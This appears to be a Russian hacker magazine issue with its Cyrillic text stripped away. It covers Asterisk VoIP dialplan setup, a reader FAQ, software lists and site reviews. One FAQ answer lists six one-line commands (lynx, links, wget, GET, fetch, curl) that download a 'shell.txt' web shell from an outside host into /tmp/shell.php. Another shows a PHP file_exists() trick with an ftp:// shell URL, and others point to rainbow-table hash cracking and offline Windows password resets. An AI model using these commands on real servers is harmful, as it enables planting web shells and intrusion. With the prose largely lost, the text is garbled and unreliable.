, VoIP-.

info



IVeS ( videocodec_nego_fix_ast-1.4.13.patch.gz), , Digium.

video



Asterisk:
,
, .

exten => *98,1,Answer()
exten => *98,n,Wait(2)
exten => *98,n,Record(/tmp/myrecord%d:wav)
exten => *98,n,Wait(1)
exten => *98,n,Playback(${RECORDED_FILE})
exten => *98,n,Wait(1)
exten => *98,n,Hangup()

/ Asterisk , privetstvie.wav. ,
gsm/mp3/ogg,
.


, .
, ,
. . Directory(), , ,
.
, ,

Motion

, :
exten => *99,1,Directory(default,internal)

voicemail.conf:
[default]
401 => 1234,Andrey Matveev,andrushock@real.xakep.ru

*99, , (
mat). Allison Smith voicemail.conf
: a-n-d-r-e-y m-a-t-v-e-e-v. 1. 401 (
exten => _XXX,1,SayDigits(${EXTEN})) .
!

? , : ,
100 . ,
( )
?
SayUnixTime(), :
exten => *100,1,Answer()
exten => *100,n,SayUnixTime(,,QdhAR)
exten => *100,n,WaitMusicOnHold(10)
exten => *100,n,Goto(*100,1)

*100, Allison Smith ,


1 , , 14 50 .
10- (
directory
musiconhold.conf), ( , - ).


,
. , VoIP- Ekiga
, , allow=ilbc
allow=h264
. , Asterisk
allow=h261
1.4 (
, , , ..). , 384 /, , Asterisk, , - maxcallbitrate.
. , - , Asterisk TOS
ffmpeg, - (Type of Service) IP-, app_transcoder (sip.fontventa. , com/content/view/30/57), ffmpeg TOS . sip.conf , . tos_sip, tos_audio tos_video TOS-
1.6 SIP-, - .
, , tos_video=af41
( Asterisk),
.
iax.conf TOS
SIP IAX2. - :
(chan_h323, chan_oh323, chan_ooh323)
tos=0x18
H.323 ,
H.323 . ,
, - sip.conf :
-: Ekiga, Bria, X-lite, Linphone, Milliphone,
WengoPhone, Windows Messenger .
[general]
videosupport=yes

IAX , videosupport iax.conf .


, , :
H.261 ( ), H.263, H.263p H.264 (
Asterisk 1.4). Asterisk 1.4 , .
,
disallow=all. ,
.
disallow=all
allow=alaw
allow=gsm
allow=speex

Asterisk? ,
,
( ,
), -,
, , , ( Asterisk + Festival),
, (,
, , VPN- , , ,
IP-
, , VoIP-). ,
- :). z

links



Asterisk
Asterisk
auto-dial out
www.voip-info.org/wiki-Asterisk+autodial+out.

,
,
Asterisk-Video
(lists.digium.com/pipermail/asteriskvideo).

>> units

/ LOZOVSKY@GAMELAND.RU /

PSYCHO:
(2009, VHSRIP)
][-
/ ICQ 884888 /

FAQ UNITED:

Q: php- ( ) . ?
A:
, ,
, turnkeyhero.com/replacer_tester.php spinnertool.com, . .
:
You Can Quickly And Easily Rewrite
Your Content And Drive More And
More Ultra-Responsive Targeted
Traffic To Your WebSite Even If
You Are A Newbie!
,
:
You Can Quickly And Colloquialism
Writing Your Accumulation And
Propulsion More And More UltraResponsive Targeted Assemblage To
Your WebSite Even If You Are A
Newbie!

,
?
Q: ?
A: WordPress-
,
RSS-, .
, blogspot.
com, wordpress.com ?
!
, e-mail,
RSS-,
www.rss2email.ru.
, ,
e-mail (
e-mail, ,
).
www.rss2email.ru
.
, , ,
:).

Yahoo Pipes (pipes.yahoo.com),
RSS-,

-, .
,
-: ,
,
,
.
(z#110).
Q: , ,
?
A: ! Start Run
ipconfig .
NAT, IP:
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
Q: n
?
A: , Lopa.

: My Computer Manage Local users and
groups Users
Properties Sessions.
Never. Run
tscc.msc RDP :
net accounts /forcelogoff:no
net accounts /maxpwage:unlimited
Q: -
. ?
A: ,
LiveStreet (http://livestreet.ru) (aka ort).
:
UTF-8


, , ,
, , ,



(ACL)
(
, ..)


-
-


e-mail
, ,
VKontakte.ru,
. API ,

userapi.com.
Q: ,
file_exists(). ?
A: ! .Slip (
!). ,
, PHP 5.0.0, file_exists()


.
ftp://, php://memory, php://temp, ssh2.sftp://.
true!
<?php
echo file_exists("ftp://user:pwd@host/shell.txt");
?>
- .Slip:
http://forum.antichat.ru/thread99589.html.
Q: - psd.
css html?
.
A: - http://www.psd2cssonline.com.
,
:
1. .
2. 8-
RGB (16- ).
3. .
4. Psd- 4 (8 ).
www.psd2cssonline.com/node/9.
?
Upload your
PSD
!
Q: ,
( curl
wget)?
A: :
lynx: lynx -source "http://site.com/shell.txt" > /tmp/shell.php
links: links -source "http://site.com/shell.txt" > /tmp/shell.php
wget: wget -O /tmp/shell.php http://site.com/shell.txt
GET: GET http://site.com/perl.txt > /tmp/shell.php
fetch: fetch -o shell.php http://site.com/shell.txt
curl: curl --output shell.php http://site.com/shell.txt
Q: ! ?
A: Offline NT Password &
Registry Editor (home.eunet.no/~pnordahl/ntpasswd).
:
,

Windows NT/2k/XP/
Vista


offline,

, CD

!
Q: md5-, , ,
.
?
A:
: http://rainbowtables.shmoo.com.
rainbow tables:
1. ;
2. +
;
3. + + .
( ) RainbowCrack 1.2 (http://www.antsight.com/zsl/rainbowcrack).
rainbow
:
[ABCDEFGHIJKLMNOPQRSTUVWXYZ] 610 MB (8353082582 );
[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] 3 GB (80603140212 );
[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] 24 GB (915358891407 );
[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~'[]{}|\:;"'<>,.?/ ] 64 GB (7555858447479 );
[abcdefghijklmnopqrstuvwxyz0123456789] 36 GB (2901713047668 ).
Q: ICQ-
- AOL.
,
?
A:
ICQ 6.5 (
), .pin. :
1. http://ru.toonel.net
Windows- , Java
( 2.0 MB);
2. ;
3. , ,
127.0.0.1;
4. 127.0.0.1 .
. 8090 ;
;
5. ,
,
, https,
localhost, 8090 ( ,
).
DNS
;
6. .
P.S. &RQ
UIN #1,
QIP Miranda. (http://andrq.org).
Q: ! ,
! ?
A:
mstsc:
mstsc /admin (, Windows XP
SP3);
mstsc /console (, Windows
XP SP2 , , ).
, Run taskmgr, :).
P.S.

(
)
. :
.
Q: , Hyper-V Windows7.
A: ! :
1. Remote Admin Tools
Microsoft: technet.microsoft.com/en-us/library/cc780654.aspx.
2. Control Panel
Programs and Features Turn
Windows features on or off.
3. Hyper-V
Remote Server Administration Tools Role
Administration Tools Hyper-V Tools.
Q: PowerShell ,
regedit?

.
A: , PowerShell ,
.REG-. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf
@=@SYS:DoesNotExist, (
).
,
.
function Disable-AutoRun
{
    $item = Get-Item `
        "REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping\AutoRun.inf" `
        -ErrorAction SilentlyContinue
    if (-not $item) {
        $item = New-Item "REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping\AutoRun.inf"
    }
    Set-ItemProperty $item.PSPath "(default)" "@SYS:DoesNotExist"
}

Q: ,
USB. :

USB?
A: , : USBTrace (www.sysnucleus.com), USB Monitor Professional (www.hhdsoftware.com), USBSpy 2.0 (www.everstrike.com/usb-monitor).
.

,
.
usbmon,
USB-.

, debugfs
insmod usbmon:
mount -t debugfs none_debugs /sys/kernel/debug
modprobe usbmon
USB-
cat:
cat /sys/kernel/debug/usbmon/1u
ASCII ,
. , . Libpcap
usbmon, , , USB-
tcpdump.

Wireshark
(www.wireshark.org).
Q:
,
?
A: .
1. Firefox IE
Tab (ietab.mozdev.org) Internet
Explorer OperaView (operaview.mozdev.org)
, Opera.
2. Lunascape,
-
Trident (Internet Explorer), Gecko (Mozilla
Firefox) WebKit (Safari, Google Chrome).
www.lunascape.tv.
Q: .EXE .DLL
(.. , )?
A: Visual Studio:
link.exe /dump /headers <.exe>

Microsoft
filever.exe (http://support.microsoft.com/kb/913111), , , :
filever.exe <.exe>
z
>Net
CCNA Network Visualizer 6.0
Cookienator 2.5.32
Google Chrome 2.0.172.0
HamachiSetup 1.0.3.0
Iconix

>Multimedia
AAA Logo 2009 3.0
CamSpace 8.1
IKEA Home Planner
iTunes 8.1
LastFM 1.06
LiberTV 1.4.0.0
Microsoft WorldWide Telescope
Random MixTape Maker 1.8.27.73
SumatraPDF 0.9.3
TrackMe
Tunatic 1.0.1b

>Misc
Eyeskeeper 2.0
f.lux
Jedi Concentrate
Jedi Window Dock
NiftyWindows 0.9.3.1
OpenWithView 1.02
Process Blocker 0.5b
TaggedFrog 0.8.1
Tudumo 1.1.1.25
UbitMenu
Workrave 1.9.0

>Games
PCSX2 0.9.6

>Development
CodeLobster PHP Edition 3.0
CollabNetSubversion 1.6.0-7
E-TextEditor 1.0.30
Intype Alpha 0.3.1.547
Titanium SDK 0.3
TortoiseSVN 1.6.0

>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns 9.40
DAEMON Tools Lite 4.30.3
Download Master 5.5.10.1163
FarPowerPack 1.15
FileZilla Client 3.2.3.1
K-Lite Mega Codec Pack 4.75
Miranda IM 0.7.17
Mozilla Firefox 3.0.8
Notepad++ 5.3.1
Opera 9.64
PuTTY 0.60
QIP Infium RC4 Build 9030
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
XnView 1.96

>>UNIX
>Desktop
2ManDVD 0.6.2
AcidRip 0.14
Archimedes 0.52.0
Avidemux 2.4.4
DigiKam 0.10
DVDStyler 1.7.2
Exaile 0.2.14
FBReader 0.10.5
Ffmpeg 0.5
Gnome 2.26
GPicView 0.1.11

>System
Avira AntiVir Personal 9
Bill2's Process Manager v3.3.0.1
Drive Backup 9.0 Express
FBackup 4.1
HD_Speed 1.5.3.64
KDE 0.9.5-0
MONyog MySQL Monitor and Advisor
3.0.4
MySQL 6.0 Alpha
Perfgraph 3.0
PortableApps.com Suite 1.5.2
RadarSync 2009
Revo Uninstaller 1.80
SQLyog 8.04

>Security
ExpanDrive 1.8.3
FileFuzz
Online Solutions Security Suite
0.8 Beta
Panda USB Vaccine 1.0.0.19
Swish 0.2.1.9
SysAnalyzer
Wireshark 1.0.6

Firefox:
CoolPreviews 2.7.2
DOM Inspector 2.0.3
Firebug 1.3.3
Flashblock 1.5.9
FoxyProxy 2.8.14
HackBar 1.3.2
NoScript 1.9.1.4
SQL Inject Me 0.4.0
Tamper Data 10.1.0
Torbutton 1.2.1
Web Developer 1.1.6
XSS Me 0.4.0

IE7Pro 2.4.5
Internet Explorer 8.0
Lunascape 5 RC1
Mikogo
Opera Turbo alpha
qutIM 0.2a
RDP Manager
The Favorite Start Page 1.77
TightVNC 1.3.10
X-Lite 3.0
Yoics for Windows 2.6.086

>Net
Amsn 0.97.2
bareFTP 0.2.1
Ekiga 3.2.0
Gajim 0.12.1
LFTP 3.7.11
Mozilla Firefox 3.0.8
Mozilla Thunderbird 2
Opera 9.64
Opera Turbo 10.0.4166 Alpha
Pidgin 2.5.5
Psi 0.12
QuickSynergy 0.9.0
qutIM 0.2 alpha
Smuxi 0.6.3
Synapse IM
Synergy 1.3.1
Tightvnc 1.3.10

>Games
Neverball 1.5.0
OpenArena 0.7.1

>Devel
Adventure PHP Framework 1.8
Anjuta IDE 2.26
bashdb 4.0.0.2
DDD 3.3.12
EiffelStudio 6.3
IntellijIDEA 8.1
MonoDevelop 1.9.3
Nasm 2.06rc8
Pango 1.24.0
Parrot 1.0
QDevelop 0.27.4
Qt 4.5.0
Qt Creator 1.0
RapidSVN 0.9.8
Ruby 1.9.1
Subversion 1.6.0
Titanium
Ruby - Aptana Studio 1.2.5
Ruby - Arcadia 0.6.0
Ruby - FreeRIDE 0.9.6
Ruby - IronRuby 0.3
Ruby - JRuby 1.2.0
Ruby - korundum 3.5.5
Ruby - qt4-qtruby 2.0.3
Ruby - Rails 2.3.2
Ruby - RubyGems 1.3.1
Ruby - wxRuby2 2.0.0

Intipunku 0.4
Jajuk 1.7.1
Medusa4 3.1.1
Octave 3.0.3
OpenOffice.org 3.0.1
PeaZip 2.5.1
Perl Audio Converter 4.0.5
Picasa 3.0 beta
sK1 0.9.0
SongBird 1.1.1
Sound Juicer 2.26.0
Xneur 0.9.3
Xvidcap 1.1.7

>X-distr
BackTrack 4 beta
Damn Vulnerable Linux 1.5
nUbuntu 8.12
STD 0.1

>System
Apcupsd 3.14.5
ATI Radeon Linux Display Drivers 9.2
Cobbler 1.4.3
Foremost 1.5.5
LDAP Account Manager 2.5.0
Lynis 1.2.4
NVClock 0.8
nVidia Linux Display Driver x86
180.29
PCSX2 0.9.6
Photorec 6.10
Qemu 0.10.1
rovclock 0.6e

>Server
Apache 2.2.11
ASSP 1.4.3.1
Asterisk 1.6.0.6
Bacula 2.4.4
DBMail 2.3.5
djbdns 1.05
Dnstop 2009.01.28
Dovecot 1.2 beta4
Icecast 2.3.2
MediaTomb 0.11
Mongoose 2.4
PostgreSQL 8.3.7
Postoffice 1.4.10
TFTP Server 1.6
Unbound 1.2.1
VideoLAN Server 0.5.6
Vino 2.26.0

>Security
Automated Password Generator
2.2.3
ClamAV 0.95
Epicwebhoneypot 1.0c
Fail2ban 0.8.3
Ferm 2.0.5
GnuPG 2.0.11
iodine 0.5.1
ITS4 Security Scanner 4-1.1.1
m0n0wall 1.3b15
Nmap 4.76
OpenVAS 2.0
RogueScanner 2.6.0.0
SILC 1.1
Snare 1.5.0
Strongswan 4.2.13
UnHash 1.0
Unhide
Wireshark 1.0.6

Tkabber 0.11.1

WWW2
2

SCREENTOASTER
WWW.SCREENTOASTER.COM

! ,
,
, , , , ! ScreenToaster (Linux,
Windows, Mac) , , , .
? SWF,
, !

QUAKE3

QUAKE LIVE
WWW.QUAKELIVE.COM

- , Quake3 Pentium 3d- 2 FPS. :)


? iD Software, , ,
, - !
, IE
Firefox. ,
, , ..
Q3 . , : Quake Live
-.

AUDIOTAG.INFO
WWW.AUDIOTAG.INFO

: ? -
AudioTag, ,
, . ,
10-40 . AudioTag.info
.
-. : .

MICROSOFT LIVE SYNC


WWW.FOLDERSHARE.COM
- email,
, , ,
, : ! Foldershare,
Microsoft,
. ,
:
Live Sync !
